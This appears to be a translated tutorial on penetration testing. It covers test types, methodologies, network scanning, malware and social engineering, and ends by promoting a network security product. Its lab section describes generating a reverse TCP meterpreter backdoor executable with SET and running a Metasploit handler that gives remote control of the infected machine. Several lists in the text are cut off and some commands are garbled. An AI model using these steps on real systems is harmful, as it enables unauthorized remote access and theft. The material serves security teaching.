The objects of testing can be both separate information systems, for example: CMS (content management system), CRM (customer relationship management system), Internet client-bank, and the entire infrastructure as a whole: network perimeter, wireless network, internal or corporate network, as well as an external perimeter.
Penetration Testing Challenge- search for all possible known software vulnerabilities (software), password policy flaws, flaws and subtleties of IS configuration settings. During such a test, the tester arranges a pseudo-attack on the corporate network, staging the actions of real intruders or an attack carried out by malicious software without the direct participation of the tester himself. The purpose of these tests is: to identify weaknesses in the protection of the corporate network from such attacks and eliminate the vulnerabilities found during pseudo-attacks.
Penetration testing is usually divided into BlackBox, WhiteBox and GreyBox:
black box- "black box". The specialist has only publicly available information about the purpose of the study, its network and parameters. This option is as close as possible to the real situation. As initial data for testing, the performer is given only the name of the company or its website, and all other information, such as IP addresses used by the company, websites, points of exit of the company's offices and branches to the Internet, the performer will have to find out on his own.
white box- the complete opposite of BlackBox. In this case, the specialist is provided with the maximum information necessary for him, up to administrative access to any server. This method allows you to get the most complete study of the vulnerability of the object. With WhiteBox, the performer will not have to spend time collecting information, mapping the network, and other actions before starting testing, and will also reduce the time of testing itself, because. some checks simply do not have to be done. Plus this method in a more complete and integrated approach to research. The downside is that it is less close to the situation of a real attack by an attacker.
gray box- This is a middle option between WhiteBox and BlackBox, when the performer acts according to the BlackBox option and periodically requests information about the system under test in order to reduce research time or apply their efforts more efficiently. This option is the most popular, as it allows you to test without spending too much time collecting information, and spend more time searching for vulnerabilities, while this option remains close enough to the real situation of the attacker's action.
1. FEATURES OF PENETRATION ON A REMOTE COMPUTER SYSTEM.
Any objective and complete penetration testing has a number of features and must be carried out taking into account the recommendations and rules.
The rules and framework for informational penetration testing are presented in the OSSTMM and OWASP methodologies. Subsequently, the obtained data can be easily adapted to assess compliance with any industry standards and "best world practices", such as Cobit, ISO/IEC 2700x series standards, CIS/SANS/NIST/etc recommendations and PCI DSS standard.
Technological data alone will not be sufficient to carry out such an assessment in its entirety. A full assessment requires interviewing employees of various departments of the company being assessed, analysis of administrative documentation, various processes information technologies(IT) and information security(IB) and much more.
As for penetration testing in accordance with the requirements of the information security standard in the payment card industry, it does not differ much from the usual testing conducted using the OSSTMM and OWASP methods. Moreover, the PCI DSS standard recommends adhering to the OWASP rules when conducting both pentest (AsV) and audit (QSA).
The main differences between PCI DSS testing and penetration testing in the broad sense of the word are as follows:
The GrayBox method allows you to reduce the risk of denial of service when carrying out such work in relation to information resources that operate 24/7.
In general, PCI penetration testing must meet the following criteria:
Determination of the boundaries of the study. First of all, it is necessary to identify the boundaries of penetration testing, determine and agree on the sequence of actions performed. At best, a network map can be obtained from the information security department, which schematically shows how the processing center interacts with the overall infrastructure. At worst, you will have to communicate with system administrator who knows his own shortcomings and obtaining comprehensive data about information system would be hampered by his reluctance to share his IP data. One way or another, to conduct a PCI DSS penetration test, at a minimum, you need to obtain the following information:
2. STAGES OF PENETRATION TESTING
Consider the possible stages of penetration testing. Depending on the information available (BlackBox / WhiteBox / GreyBox), the sequence of actions may be different: data collection, network scanning, system hacking, malware, social engineering.
2.1 Collection of data.
Collection of data from open sources of information. Open sources are sources of information that are accessed legally, on legal grounds. The search for the necessary information using open sources has been adopted by many civilian and military structures working in the field of intelligence and industrial espionage.
Access to the necessary information on the Internet can be implemented in various ways. These can be hyperlinks, search in various directories (websites, blogs, etc.), you can view search results. For certain purposes, it is impossible to do without searching through specialized databases.
Information can also be provided by the internal URL of the site, e-mail addresses, phone numbers, faxes, DNS server, IP address range, routing information.
With the development of the Internet, WHOIS services have become widespread. Whois (from the English “who is” - “who is”) is a network protocol based on the TCP protocol. Its main purpose is to obtain information about the "registrant" (the owner of the domain) and the "registrar" (the organization that registered the domain), names DNS servers, registration date, and expiration date. Entries about IP addresses are grouped into ranges (for example, 8.8.8.0 - 8.8.8.255) and contain information about the organization to which this range is delegated.
2.2 Network scanning.
Network scanning can be divided into components:
1. Scanning a range of IP addresses to determine "live" hosts
2. Scanning ports
3. Discovery of services and their versions
4. Scan to determine the OS
5. Vulnerability Scanning
1. Scanning a range of IP addresses.
A fundamental task in exploring any network is to reduce the set of IP ranges to a list of active hosts. Scanning every port of every IP address is slow and unnecessary. The interest in researching certain hosts is largely determined by the goals of the scan. While administrators' tasks of discovering live hosts on a network can be accomplished with a simple ICMP ping, people testing the network's ability to withstand attacks from outside need to use a variety of ping sets to bypass the firewall.
The task of discovering hosts is sometimes referred to as a ping scan, but it is far superior to using the usual ICMP queries associated with the ubiquitous ping tools. It is preferable to scan the network using arbitrary combinations of multiport TCP SYN/ACK, UDP and ICMP requests. The purpose of all these requests is to receive responses indicating that the IP address is currently active (in use by the host or network device). On most networks, only a small percentage of IP addresses are active at any given time. This is especially true for address spaces like 10.0.0.0/8. Such networks have 16 million IP addresses, but there are times when they are used by companies with no more than a thousand machines. The host discovery feature can find these machines in this vast sea of IP addresses.
2. Scanning ports.
There are many different port scanning techniques and are chosen for specific task suitable (or a combination of several). Consider the most popular scanning techniques:
TCP SYN scan
SYN is the default and most popular scan type. It can be launched quickly, it is capable of scanning thousands of ports per second on a fast connection, and is not hindered by restrictive firewalls.
Various types of UDP scanning
While most Internet services use the TCP protocol, UDP services are also widely used. The three most popular are DNS, SNMP and DHCP (using ports 53, 161/162 and 67/68). Because Because UDP scanning is generally slower and more complex than TCP, many security professionals ignore these ports. This is a mistake, because there are UDP services that are used by attackers.
TCP NULL, FIN and Xmas Scan
These three types of scans use a subtle loophole in the TCP RFC to separate open and closed ports.\
TCP ACK Scan
This type of scan is very different from all others in that it is not able to detect an open port. It is used to identify firewall rules, whether they are stateful or not, and to determine which ports they filter.
3. Discovery of services and their versions.
Scanning a remote system may reveal that ports 25/tcp, 80/tcp, and 53/udp are open. Using the information, you can find out that these ports probably correspond to the mail server (SMTP), web server (HTTP), and domain name server (DNS) respectively. This information is usually correct because the vast majority of services using 25 TCP port, in fact, mail servers. However, you should not rely entirely on this information. People can and do run services using non-standard ports.
After detecting any TCP and/or UDP ports, they are identified in order to determine which applications (services) use them. Using the query database to call various services and the corresponding expressions for recognizing and parsing responses, you can determine the protocols of the service (e.g. FTP, SSH, Telnet, HTTP), application name (e.g. ISC BIND, Apache httpd, Solaris telnetd), version number, hostname, device type (eg printer, router), OS family (eg Windows, Linux) and sometimes various details such as whether it is possible to connect to the X server, SSH protocol version, or username.
4. Scan to determine the OS.
It is possible to determine the OS on a remote system based on an analysis of the operation of the TCP/IP stack. A series of TCP and UDP packets are sent to a remote host and virtually every bit in the response is examined. After conducting many tests such as TCP ISN sampling, TCP option support, IP ID sampling, and analyzing the duration of the initialization procedure, the results are compared with a database containing known sets of typical results for various OSes and, if matches are found, a conclusion can be made about the installed OS.
5. Vulnerability scanning.
Vulnerability scanning is a fully or partially automated process of collecting information about the availability of a network node of an information network ( personal computers, servers, telecommunications equipment), network services and applications used on this node and their identification, used by these services and applications ports, in order to determine existing or possible vulnerabilities.
2.3 Hacking the system.
The success of implementing one or another hacking algorithm in practice largely depends on the architecture and configuration of the particular operating system that is the object of this hacking.
However, there are approaches to which almost any operating system can be subjected:
2.4 Malicious software.
Very often, malware is used to gain access to an infected system. Typically, malware that has functionality backdoor posted on a file-sharing resource under the guise of a legitimate program.
Malicious software is software that is developed to gain unauthorized access to computer computing resources, as well as data stored on it. Such programs are designed to harm the owner of the information or the computer by copying, distorting, deleting or substituting information.
Trojans are malicious programs that perform actions that are not authorized by the user. Such actions may include:
Trojans are classified according to the type of actions they perform on a computer.
2.5 Social engineering.
In order for malware to end up on the attacked IP, social engineering is used. Social engineering - a method of unauthorized access to information resources based on the characteristics of human psychology. The main goal of social engineers is to gain access to secure systems in order to steal information, passwords, data about credit cards and so on. The object of attack is not the machine, but its operator. Therefore, all methods and techniques of social engineering are based on exploiting the weaknesses of the human factor.
There are several common techniques and types of attacks that social engineers use. But a common feature of all these methods is misleading, in order to force a person to perform some action that is not beneficial to him and is necessary for a social engineer. To achieve the desired result, a social engineer uses a number of various tactics: impersonating another person, distracting attention, forcing psychological stress, etc. The ultimate goals of deception can also be very diverse.
Social engineering techniques:
A 2003 study by the Information Security Program showed that 90% of office workers are willing to divulge confidential information, such as their passwords, for some kind of favor or reward.
Organization of a pseudo-attack.
To organize a pseudo-attack on computer system use software Social Engineering Toolkit(SET) and Metasploit Framework(MFS). These utilities are included by default in the Backtrack 5 distribution, designed to test the possibility of system and network hacking. We also use two virtual machines with such operating systems as:Windows7 and back track 5.
backdoor generation. We will use SET to create a reverse TCP backdoor, and MFS to create a handler (handler) to process packets from the created backdoor, which will maintain a communication channel between a potential attacker and the system on which the backdoor will be launched.
All actions are performed in console mode on OS Backtrack 5. Payload creation is achieved through the SET utility, p. 4 Create a payload and lister
Creation of payload with reverse TCP (to establish feedback) is done by selecting item 2 Windows reverse— TCP meterpreter and then item 16 Backdoored Executable. This operation completes the creation of the backdoor. When creating it, you also specify the port number through which the Feedback. In folder / pentest/ exploits/ SET msf.exe will be generated based on the options we have selected.
Exploit setup. The exploit is designed to receive TCP requests from the created backdoor. Its configuration is done by launching MFS and selecting the exploit handler (listener): use exploit/multi/handler.
As a result, MFS switches to the context of the exploit handler. The next task is to configure the payload for this exploit. Since the backdoor is oriented (created) with the Revers_TCP Meterpretor, the information is exchanged through TCP connection: set/ payload windows/ meterpreter/ reverses_ tcp. In addition, it is necessary to specify the Local Host (ip-address of a potential attacker) in the options.
Running the handler leads to the meterpretor context, where the sessions to which you can connect will be represented. The session will appear after the backdoor is launched on a remote machine, which in some cases is achieved in practice through social engineering.
To simulate this process, the backdoor is launched on the second virtual machine. After that, a session to this system will be available in meterpretor, that is, our backdoor provides a communication channel, and we gain control over the infected machine.
Each user, be it an individual or an enterprise, necessarily has information that is unique from his point of view. An enterprise can be both a commercial structure and a state, municipal or budgetary institution, but in all cases its activities are somehow supported by a computer network. And the need to ensure the information security of a computer network is beyond doubt.
Sources of threats to the network can be both external and internal. The obvious external source is the Internet. Even if users local network do not have direct access to the Internet, they can use mail services and receive information from the outside, the security of which is not guaranteed. Strictly speaking, the Internet is not a source of threat, but a medium through which malicious information enters the local network. The initiators of threats can be unscrupulous partners, criminal or, on the contrary, law enforcement agencies, hackers, even the technical staff of the provider. The internal danger lies in the deliberate introduction or creation of conditions for the introduction of malicious software by employees of the enterprise. The hierarchical level of the employee here has practically no meaning. As an internal potential source of threat, it is necessary to consider the used low-quality or outdated hardware and software for information processing - the vulnerability of these components can negate the security of a computer network.
The consequences of insufficient data protection on the network are manifold - theft, destruction or distribution of confidential information (trade secrets), personal data, substitution of information, blocking access to it, limitation of functionality or complete shutdown of the corporate network. The latter leads to the actual stop of business processes.
Protecting computer networks is essential. It must be understood that a security threat of one scale or another always exists. Whether it will be implemented or not depends on how the network is organized and what methods of protecting the local network are used. A LAN security system becomes reliable when it uses hardware of sufficient performance and high-quality software with transparent management - the user must understand what he is doing and why. In the case of a corporate network, a hardware firewall is an adequate solution. Together with installed program The Internet Control Server (ICS) implements a comprehensive countermeasure against external and internal threats. Traffic (including internal traffic) passing through the network gateway is continuously analyzed by the built-in computer network protection tools. The DLP module filters possible information leaks, streaming antivirus detects malware even before it penetrates network computers. The Suricata Attack Detector captures potentially malicious activity on the network. The connection monitor shows traffic flows from each client. Many network security components are easily configured, their work becomes clear even to a non-specialist, and it is easy to manage such a program.
It is the high level of security of the local network that makes a working environment out of many interacting computers that allows the enterprise to function normally. A network protection program should be complex and modern inside, but simple and understandable at the level of user interaction.
